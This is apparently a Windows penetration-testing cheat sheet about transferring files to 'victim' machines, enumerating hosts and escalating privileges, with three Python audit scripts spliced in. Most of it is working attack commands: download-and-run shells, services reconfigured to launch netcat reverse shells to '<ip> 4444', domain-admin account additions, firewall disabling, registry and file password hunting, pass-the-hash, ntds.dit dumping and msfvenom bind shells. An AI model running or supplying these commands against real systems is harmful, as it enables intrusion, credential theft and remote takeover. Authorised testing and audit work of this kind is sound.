Windows Commands

File Transfers

[+] FTP File Transfers
From a cmd.exe prompt
echo open >> ftp_commands.txt
echo anonymous >> ftp_commands.txt
echo password >> ftp_commands.txt
echo binary >> ftp_commands.txt
echo get shell.exe >> ftp_commands.txt
echo bye >> ftp_commands.txt
ftp -s:ftp_commands.txt
[+] Wget.vbs
From a cmd.exe prompt
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
From the Windows host
cscript wget.vbs shell_nc_32.exe
[+] Powershell
On Local Machine
powershell -command "& {(New-Object Net.WebClient).DownloadFile('', 'C:\inetpub\drupal-7.54\shell64.exe') }"
python -m SimpleHTTPServer 80
On Windows Victim Machine
echo $url = "" >> rvshell.ps1
echo $output = "$PSScriptRoot\rvshell.exe" >> rvshell.ps1
echo $start_time = Get-Date >> rvshell.ps1
echo Invoke-WebRequest -Uri $url -OutFile $output >> rvshell.ps1
echo Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)" >> rvshell.ps1
On Windows Victim Machine
echo @ECHO OFF >> getshell.bat
echo Powershell.exe -exec Bypass -File "rvshell.ps1" >> getshell.bat
echo PAUSE >> getshell.bat
On Windows Victim Machine
powershell -command "& {(New-Object Net.WebClient).DownloadFile('', 'c:\somefile') }"
[+] Debug.exe
[+] Ncat.exe
Copy files from Windows To Linux
Step 1: Download netcat onto the Windows system and copy nc.exe into the directory where your file exists, e.g. C:\test\nc.exe
Step 2: Install netcat on Ubuntu
#apt-get install netcat
Step 3: Now netcat is available on both Windows and Linux (Ubuntu).
Open a command prompt, go to the directory where your file is located and run the command
below. This will act as the server.
C:\test> type backup.iso | nc.exe -l -p 3333
Note: "type" is a command in windows.
Step 4: Receive backup.iso on the client machine (Linux/Ubuntu) with the following. This will
act as the client.
# nc 3333 > backup.iso
Copy files from Linux to Windows
On the Linux system run the command below. This will act as the server.
#cat backup.iso | nc -l -p 3333
On Windows run the command below. This will act as the client.
C:\test> nc.exe 192.168.yyy.yy 3333 > backup.iso
Issue a ^C on the source system once you see the file size in the destination directory.
Be sure to check that the received file is the same size as the original.
[+] TFTP
Starting the Server
Kali comes with a TFTP server installed, atftpd, which can be started with a simple "service
atftpd start". I've always had a hell of a time getting it configured and working though, and I
rarely need to start and keep running a TFTP server as a service, so I just use the simpler
Metasploit module.
Metasploit, like with FTP, has an auxiliary TFTP server module at auxiliary/server/tftp.
Set the module options, including TFTPROOT, which determines which directory to serve up,
and OUTPUTPATH if you want to capture TFTP uploads from Windows as well.
Downloading the Files
Again, assuming the tftp utility is installed, you can grab a file with one line from the
Windows prompt. It doesn't require any authentication: just use the -i flag and
the GET action.
Exfiltrating files via TFTP is simple as well with the PUT action. The Metasploit server saves
them in /tmp by default.
TFTP is a convenient, simple way to transfer files as it doesn't require authentication and
you can do everything in a single command.
Sidenote: installing TFTP. As I mentioned, TFTP is not included by default on newer
versions of Windows. If you really wanted to, you can enable the TFTP client from the
command line:
pkgmgr /iu:"TFTP"
Might come in handy, but I'd always rather "live off the land" and use tools that are already

Privilege Escalation

[+] Windows Exploit Suggester
Systeminfo > sysinfo.txt
Gather system information and feed through
python --update
python -i systeminfo.txt -d 2017-08-20-mssb.xls
[+] Pass the hash from within target system with password in registry:
reg query HKLM /f password /t REG_SZ /s # Check for passwords in the registry
psexec.exe -u administrator -p HASHEDPASSWORDFOUNDABOVE Reverseshell.exe
Now you have a reverse system shell.
[+] Pass the hash with SMB Open externally:
Download SAM and SYSTEM file to Kali
pwdump SYSTEM SAM | tee Hashes.txt
pth-winexe -U administrator%HASHEDPASSWORD:FROMSAMFILE // cmd.exe
[+] Scripts to run:
[+] PowerUp.ps1:
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
[+] Sherlock.ps1
powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"
Add folder to PATH
set "PATH=%PATH%;C:\Program Files\Oracle\VirtualBox"
[+] Enumeration:
arp -A
echo %username%
ipconfig /all
netstat -ano
route print
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
net users
net user <username>
net user user password /add
net localgroup
net localgroup administrators
net localgroup administrators user /add
net share
runas /savecred /user:administrator cmd
[+] Domain:
net view /domain
net user /domain
net accounts /domain
net group /domain
net group "domain admins" user /add /domain
net group "domain controllers" user /add /domain
nltest /dclist
[+] Firewall:
netsh firewall show state
netsh firewall show config
netsh firewall set opmode disable
[+] Cleartext Passwords:
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
findstr /spin "password" *.*
[+] Tools:
[+] Interesting files:
Map drive:
dir /s /b
dir /s /b | findstr bat
dir /s /b | findstr cmd
dir /s /b | findstr txt
dir /s /b | findstr zip
dir /s /b | findstr ps1
[+] Sysprep:
type c:\sysprep.inf
type c:\sysprep\sysprep.xml
[+] Unattend:
type c:\unattend.xml
type %WINDIR%\Panther\Unattend\Unattended.xml
type %WINDIR%\Panther\Unattended.xml
msfconsole > post/windows/gather/enum_unattend
[+] VNC:
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c: /s /b | findstr /si *vnc.ini
[+] MSF
[+] Registry:
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
[+] Scheduled Tasks:
schtasks /query /fo LIST /v > tasks.txt
type tasks.txt | findstr /C:"SYSTEM" /C:"Task To Run"
tasklist /SVC
[+] Weak Service Permissions:
wmic service list brief
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
Check for BUILTIN\Users with full access (F):
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a" | findstr "BUILTIN\Users:(F)"
Alternative: icacls <file>
Replace the executable with a payload
wmic service <service> call stopservice
wmic service <service> call startservice
shutdown -r -t 0
MSF > exploit/windows/local/service_permissions
[+] Unquoted Service Paths
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
sc query
sc qc <service>
C:\program files\sub.exe
C:\program files\sub dir\file.exe
MSF > exploit/windows/local/trusted_service_path
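An added audit example, not code from the original page: given sc qc output (constructed samples below), it lists the executables Windows would try before the intended one for every unquoted auto-start service path, e.g. C:\program files\sub.exe for C:\program files\sub dir\file.exe, so the parent directories can be checked for write access by non-administrators. Service names and paths are made up.

```python
import re

# Constructed `sc qc <service>` outputs in the format shown on this page;
# the service names and paths are made up for the example.
SAMPLE_SC_QC = [
    """[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Spooler
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\\WINDOWS\\System32\\spoolsv.exe
""",
    """[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VulnSvc
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\\program files\\sub dir\\file.exe -run
""",
    """[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: QuotedSvc
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : "C:\\Program Files\\Vendor Tool\\agent.exe" -svc
""",
]

FIELD = re.compile(r"^\s*(SERVICE_NAME|START_TYPE|BINARY_PATH_NAME)\s*:\s*(.*?)\s*$", re.M)


def parse_sc_qc(text):
    """Pick the three fields the audit needs out of `sc qc` output."""
    return dict(FIELD.findall(text))


def lookahead_paths(binary_path):
    """Executables Windows would try before the intended one. Only an unquoted
    path whose executable part contains a space is affected; everything after
    the first token ending in .exe is treated as arguments. [] if unaffected."""
    if binary_path.startswith('"'):
        return []                      # quoted: the boundary is explicit
    tokens = binary_path.split(" ")
    exe_end = next((i for i, t in enumerate(tokens)
                    if t.lower().endswith(".exe")), None)
    if not exe_end:                    # None or 0: no space inside the path
        return []
    # each shorter prefix is tried as "<prefix>.exe" before the real binary
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, exe_end + 1)]


def audit(sc_outputs):
    """(service, [paths whose parent directory must not be user-writable]).
    Mirrors the wmic filter above: auto-start only, C:\\Windows skipped."""
    findings = []
    for out in sc_outputs:
        svc = parse_sc_qc(out)
        path = svc.get("BINARY_PATH_NAME", "")
        if "AUTO_START" not in svc.get("START_TYPE", ""):
            continue
        if path.lower().startswith("c:\\windows\\"):
            continue
        hits = lookahead_paths(path)
        if hits:
            findings.append((svc["SERVICE_NAME"], hits))
    return findings
```

Each reported path is one that icacls (or accesschk -uwdqs, as used on this page) should confirm is not writable by Users or Authenticated Users.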
Change the upnp service binary:
sc config upnphost binPath= "C:\Temp\nc.exe <ip> 4444 -e C:\Windows\system32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
sc start upnphost
Binary planting:
sc query | findstr SERVICE_NAME
sc config <service> binPath= "C:\Temp\nc.exe <ip> 4444 -e C:\Windows\system32\cmd.exe"
sc config <service> obj= ".\LocalSystem" password= ""
sc qc <service>
sc start <service>
[+] AlwaysInstallElevated:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
MSF > exploit/windows/local/always_install_elevated
[+] Accesschk:
Upload accesschk.exe
accesschk.exe /accepteula
accesschk.exe -ucqv <service>
accesschk.exe -uwcqv "Authenticated Users" *
[+] Weak folder permissions:
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
[+] Weak file permissions:
accesschk.exe -uwqs Users c:\.\
accesschk.exe -uwqs "Authenticated Users" c:\.\
[+] Enable RDP
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
[+] Powershell
powershell Get-ExecutionPolicy
powershell Set-ExecutionPolicy unrestricted
[+] Python executable
install PyWin32
python --onefile
[+] Windows kernel exploits
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041"
[+] Grab Hashes
vssadmin list shadows
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM
vssadmin delete shadows /for=C: /all
/usr/share/doc/python-impacket/examples/ -system SYSTEM -ntds ntds.dit -outputfile dump.txt LOCAL
Meterpreter alternative:
[+] Windows Privilege Escalation Checklist
OS and service pack
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
System name
Who are you?
echo %username%
Finding other users
net users
net user username
Clear-text passwords
c:\sysprep.ini - [Clear Text]
c:\sysprep\sysprep.xml - [Base64]
findstr /si password *.txt *.xml *.ini
reg query HKLM /s | findstr /i password > temp.txt
reg query HKCU /s | findstr /i password > temp.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Finding weak directory permissions
accesschk.exe /accepteula
accesschk.exe -uwdqs users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
Finding weak file permissions
accesschk.exe -uwqs users c:\.\
accesschk.exe -uwqs "Authenticated Users" c:\.\
cacls "c:\Program Files" /T | findstr Users
Weak Service permissions
accesschk.exe -uwcqv *
Cross compile exploits
cp /usr/share/exploitdb/platforms/windows/local/<exploit>.c /tmp/
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o w00t.exe /tmp/<exploit>.c -l lib
PSexec <user>@<host> <cmd>
psexec.exe \\<host> <cmd>
sc create <servicename> binpath= "c:\windows\system32\cmd.exe /k <pathtobinaryexecutable>" DisplayName= <displayname>
sc start <servicename>
Creating bind shells
msfvenom -p windows/shell_bind_tcp -f exe -o <Filename.exe> LPORT=<BindPort>
msfvenom -p windows/shell_bind_tcp -f dll -o <Filename.dll> LPORT=<BindPort>
[+] Privilege Escalation Exploits by Patch
First let's find out what OS we are connected to:
C:\Windows\system32> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Next we will see what the hostname of the box is and what user we are connected as.
C:\Windows\system32> hostname
C:\Windows\system32> echo %username%
Now we have this basic information we list the other user accounts on the box and view our
own user's information in a bit more detail. We can already see that user1 is not part of the
localgroup Administrators.
C:\Windows\system32> net users
Grab User info
C:\Windows\system32> net user user1
That is all we need to know about users and permissions for the moment. Next on our list is
networking, what is the machine connected to and what rules does it impose on those
First let's have a look at the available network interfaces and routing table.
C:\Windows\system32> ipconfig /all
C:\Windows\system32> route print
# arp -A displays the ARP (Address Resolution Protocol) cache table for all available
C:\Windows\system32> arp -A
That brings us to the active network connections and the firewall rules.
C:\Windows\system32> netstat -ano
The following two netsh commands are examples of commands that are not universal
across OS/SP. The netsh firewall commands are only available from XP SP2 and upwards.
C:\Windows\system32> netsh firewall show state
C:\Windows\system32> netsh firewall show config
Finally we will take a brief look at what is running on the compromised box: scheduled
tasks, running processes, started services and installed drivers.
# This will display verbose output for all scheduled tasks; below you can see sample output
for a single task.
C:\Windows\system32> schtasks /query /fo LIST /v
# The following command links running processes to started services.
C:\Windows\system32> tasklist /SVC
C:\Windows\system32> net start
This can be useful sometimes as some 3rd party drivers, even by reputable companies,
contain more holes than Swiss cheese. This is only possible because ring0 exploitation lies
outside most people's expertise.
C:\Windows\system32> DRIVERQUERY
The Arcane Arts Of WMIC
To give you an idea about the extensive options that WMIC has I have listed the available
command line switches below.
C:\Windows\system32> wmic /?
[+] Quick Fails
Before continuing on you should take a moment to review the information that you have
gathered so far as there should be quite a bit by now. The next step in our game plan is to
look for some quick security fails which can be easily leveraged to upgrade our user
The first and most obvious thing we need to look at is the patch level. There is no need to
worry ourselves further if we see that the host is badly patched. My WMIC script will already
list all the installed patches but you can see the sample command line output below.
C:\Windows\system32> wmic qfe get Caption,Description,HotFixID,InstalledOn
As always with Windows, the output isn't exactly ready for use. The best strategy is to look
for privilege escalation exploits and look up their respective KB patch numbers. Such
exploits include, but are not limited to, KiTrap0D (KB979682), MS11-011 (KB2393802),
MS10-059 (KB982799), MS10-021 (KB979683), MS11-080 (KB2592799). After enumerating
the OS version and Service Pack you should find out which privilege escalation
vulnerabilities could be present. Using the KB patch numbers you can grep the installed
patches to see if any are missing.
You can see the syntax to grep the patches below:
C:\Windows\system32> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
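An added patch-audit example, not code from the original post: it parses a constructed wmic qfe listing, reports which of the KBs named above are absent, and builds the findstr one-liner with those KBs filled in. An absent KB only means the patch is not installed; the OS version and service pack still decide whether the vulnerability applies.

```python
import re

# Bulletin -> KB, exactly as listed in the text above
PATCHES = {
    "KiTrap0D": "KB979682",
    "MS11-011": "KB2393802",
    "MS10-059": "KB982799",
    "MS10-021": "KB979683",
    "MS11-080": "KB2592799",
}

# Constructed sample of `wmic qfe get Caption,Description,HotFixID,InstalledOn`
SAMPLE_QFE = """\
Caption                                     Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=979682   Security Update  KB979682   2/10/2010
http://support.microsoft.com/?kbid=982799   Security Update  KB982799   8/11/2010
http://support.microsoft.com/?kbid=2393802  Security Update  KB2393802  2/9/2011
"""

KB_TOKEN = re.compile(r"KB\d+")


def installed_kbs(qfe_output):
    """Set of KB ids from the HotFixID column; the header line is skipped and
    the kbid= part of the Caption URL is ignored because it is not a KB token."""
    kbs = set()
    for line in qfe_output.splitlines()[1:]:
        for token in line.split():
            if KB_TOKEN.fullmatch(token):
                kbs.add(token)
    return kbs


def missing_patches(qfe_output, patches=PATCHES):
    """Bulletin names whose KB does not appear in the listing, sorted."""
    present = installed_kbs(qfe_output)
    return sorted(name for name, kb in patches.items() if kb not in present)


def findstr_command(patches=PATCHES):
    """The one-liner from the text above with the KB placeholders filled in."""
    flags = " ".join(f'/C:"{kb}"' for kb in patches.values())
    return f"wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr {flags}"


if __name__ == "__main__":
    print("not installed:", ", ".join(missing_patches(SAMPLE_QFE)))
    print(findstr_command())
```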
Typically these are the directories that contain the configuration files (however it is a good
idea to check the entire OS):
Note: Creds may be base64 encoded
In addition to Groups.xml several other policy preference files can have the optional
"cPassword" attribute set:
Services\Services.xml: Element-Specific Attributes
ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element,
ImmediateTaskV2 Inner Element
Printers\Printers.xml: SharedPrinter Element
Drives\Drives.xml: Element-Specific Attributes
DataSources\DataSources.xml: Element-Specific Attributes
This vulnerability can be exploited by manually browsing SYSVOL and grabbing the relevant
files as demonstrated below.
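An added audit example, not code from the original page: it walks the preference files listed above (constructed sample XML embedded below) and reports every inner element whose Properties carry a non-empty cPassword attribute, so those entries can be located and removed from SYSVOL. The attribute is matched case-insensitively because the files spell it cpassword; file contents, element names and accounts are made up.

```python
import xml.etree.ElementTree as ET

# Constructed samples of two of the files listed above; names and the
# cpassword blobs are made up, only the element layout follows the schema.
SAMPLE_FILES = {
    "Groups\\Groups.xml": """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" changed="2017-08-01 10:00:00">
    <Properties action="U" userName="LocalAdmin" changeLogon="0"
      noChange="1" neverExpires="1" cpassword="CONSTRUCTED_BLOB_1"/>
  </User>
  <Group name="Administrators (built-in)">
    <Properties action="U" groupName="Administrators (built-in)"/>
  </Group>
</Groups>
""",
    "ScheduledTasks\\ScheduledTasks.xml": """<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks>
  <TaskV2 name="Backup">
    <Properties action="C" runAs="CORP\\svc_backup" logonType="Password"
      cpassword="CONSTRUCTED_BLOB_2"/>
  </TaskV2>
  <Task name="Cleanup">
    <Properties action="C" runAs="" cpassword=""/>
  </Task>
</ScheduledTasks>
""",
}


def find_cpasswords(xml_text):
    """(element tag, element name, account) for each inner element whose
    Properties carry a non-empty cpassword; an empty attribute is ignored."""
    hits = []
    for elem in ET.fromstring(xml_text).iter():
        props = elem.find("Properties")
        if props is None:
            continue
        cpw = next((v for k, v in props.attrib.items()
                    if k.lower() == "cpassword"), "")
        if cpw:
            # users carry userName, tasks and services carry runAs/accountName
            account = (props.get("userName") or props.get("runAs")
                       or props.get("accountName") or "")
            hits.append((elem.tag, elem.get("name", ""), account))
    return hits


def scan(files):
    """Map each relative file path to its hits, omitting clean files."""
    report = {}
    for path, text in files.items():
        hits = find_cpasswords(text)
        if hits:
            report[path] = hits
    return report


if __name__ == "__main__":
    for path, hits in scan(SAMPLE_FILES).items():
        for tag, name, account in hits:
            print(f"{path}: <{tag} name={name!r}> stores a password for {account!r}")
```

To run it against a real domain, replace SAMPLE_FILES with the contents of the Groups, Services, ScheduledTasks, Printers, Drives and DataSources XML files read from the SYSVOL policies share.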
To be able to use this we need to check that two registry keys are set; if that is the case we
can pop a SYSTEM shell. You can see the syntax to query the respective registry keys
# This will only work if both registry keys contain "AlwaysInstallElevated" with DWORD
values of 1.
C:\Windows\system32> reg query
C:\Windows\system32> reg query
To finish off this section we will do some quick searching on the operating system and hope
we strike gold. You can see the syntax for our searches below.
# The command below will search the file system for file names containing certain keywords.
You can specify as many keywords as you wish.
C:\Windows\system32> dir /s *pass* == *cred* == *vnc* == *.config*
# Search certain file types for a keyword, this can generate a lot of output.
C:\Windows\system32> findstr /si password *.xml *.ini *.txt
# Similarly the two commands below can be used to grep the registry for keywords, in this case "password".
C:\Windows\system32> reg query HKLM /f password /t REG_SZ /s
C:\Windows\system32> reg query HKCU /f password /t REG_SZ /s
We will start off with Windows services as there are some quick wins to be found there.
Generally modern operating systems won't contain vulnerable services. Vulnerable, in this
case, means that we can reconfigure the service parameters. Windows services are kind of
like application shortcuts; have a look at the example below.
# We can use sc to query, configure and manage windows services.
C:\Windows\system32> sc qc Spooler
We can check the required privilege level for each service using accesschk.
# We can see the permissions that each user level has; you can also use "accesschk.exe -ucqv *"
to list all services.
C:\> accesschk.exe -ucqv Spooler
Accesschk can automatically check if we have write access to a Windows service with a
certain user level. Generally as a low privilege user we will want to check for "Authenticated
Users". Make sure to check which user groups your user belongs to, "Power Users" for
example is considered a low privilege user group (though it is not widely used).
Let's compare the output on Windows 8 and on Windows XP SP0.
# This is on Windows 8.
C:\Users\b33f\tools\Sysinternals> accesschk.exe -uwcqv "Authenticated Users" *
# On a default Windows XP SP0 we can see there is a pretty big security fail.
C:\> accesschk.exe -uwcqv "Authenticated Users" *
RW upnphost
C:\> accesschk.exe -ucqv SSDPSRV
RW BUILTIN\Administrators
RW NT AUTHORITY\Authenticated Users
RW BUILTIN\Power Users
C:\> accesschk.exe -ucqv upnphost
RW BUILTIN\Administrators
This issue was later resolved with the introduction of XP SP2, however on SP0&SP1 it can
be used as a universal local privilege escalation vulnerability. By reconfiguring the service
we can let it run any binary of our choosing with SYSTEM level privileges.
Let's have a look at how this is done in practice. In this case the service will execute netcat and
open a reverse shell with SYSTEM level privileges. Other options are certainly possible.
C:\> sc qc upnphost
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: upnphost
BINARY_PATH_NAME : C:\WINDOWS\System32\svchost.exe -k LocalService
C:\> sc config upnphost binpath= "C:\nc.exe -nv 9988 -e
[SC] ChangeServiceConfig SUCCESS
C:\> sc config upnphost obj= ".\LocalSystem" password= ""
[SC] ChangeServiceConfig SUCCESS
C:\> sc qc upnphost
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: upnphost
BINARY_PATH_NAME : C:\nc.exe -nv 9988 -e C:\WINDOWS\System32\cmd.exe
C:\> net start upnphost
Stored credentials
Search for credentials within:
Unattend credentials are stored in base64 and can be decoded manually with base64 (the decoded bytes are UTF-16LE):
user@host $ echo 'cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=' | base64 -d | iconv -f UTF-16LE
Metasploit Framework enum_unattend module and gather credentials module:
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
findstr /si password *.txt *.xml *.ini
findstr /si pass *.txt *.xml *.ini
Password recovery programs (small): RDP, Mail, IE, VNC, Dialup, Protected Storage, ...
Dumping cleartext credentials with mimikatz
Query the Windows Registry
VNC Stored:
reg query "HKCU\Software\ORL\WinVNC3\Password"
Windows Autologin:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
SNMP Parameters:
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
Putty clear text proxy credentials:
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
Search the registry - copy (pipe) to the clipboard (optional)
reg query HKLM /f password /t REG_SZ /s [ |clip]
reg query HKCU /f password /t REG_SZ /s [ |clip]
Insecure GUI apps
running as SYSTEM that can open cmd.exe or directories "files, logfiles" etc.
Directory permissions
Sysinternals tools
Check processes and start-up applications with Autoruns and procmon -
Services pointing to writeable locations
*- orphaned installs - applications not installed that still exist in startup
*- replacing unknown dlls
*- PATH directories with weak permissions - overwrites possible?
sysinternals tools
accesschk.exe -uwcqv *
*- unsecured processes
*- steal process/thread tokens (a'la incognito)
*- hijack handles for write access
Change the upnp service binary
sc qc upnphost
sc config upnphost binpath= "net user <username> /add"
sc config upnphost obj= ".\LocalSystem" password= ""
net stop upnphost
net start upnphost
May work with other services if permissions permit
Vulnerability Privilege Escalation
[+] Windows kernel privilege escalation
Tomcat Windows privilege escalation
NtGdiEnableEudc Exploit (MS11-011) - windows XP SP0-3
16262, platforms/windows/dos/16262., "MS11-011 (CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC", 2011-03-01, "Nikita
Service Tracing Key (MS10-059)
Registry Symlink Vuln (MS10-021)
No Public Exploit - VuPEN membership only
Ryujin - ADF.sys priv esc - ms11-080
pyinstaller -
py2exe -
UAC Bypass priv esc
Download Password Hashes
Download \windows\repair\sam
Download \windows\repair\system
Resources & Credits